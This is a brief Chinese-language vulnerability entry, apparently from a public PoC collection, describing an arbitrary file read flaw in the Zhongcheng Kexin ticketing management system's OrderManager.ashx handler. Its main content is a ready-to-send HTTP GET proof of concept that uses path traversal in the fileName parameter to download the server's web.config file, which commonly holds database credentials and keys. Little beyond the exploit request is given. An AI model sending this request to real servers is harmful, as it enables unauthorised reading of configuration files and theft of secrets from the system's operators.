中成科信票务管理系统 OrderManager.ashx 任意文件读取漏洞

日期: 2025-10-23 | 影响软件: 中城科信票务管理平台 | POC: 已公开

漏洞描述

中成科信票务管理系统 OrderManager.ashx 任意文件读取漏洞

PoC代码

GET /SystemManager/OrderManager/OrderManager.ashx?Method=DownTemplate&fileName=../../web.config HTTP/1.1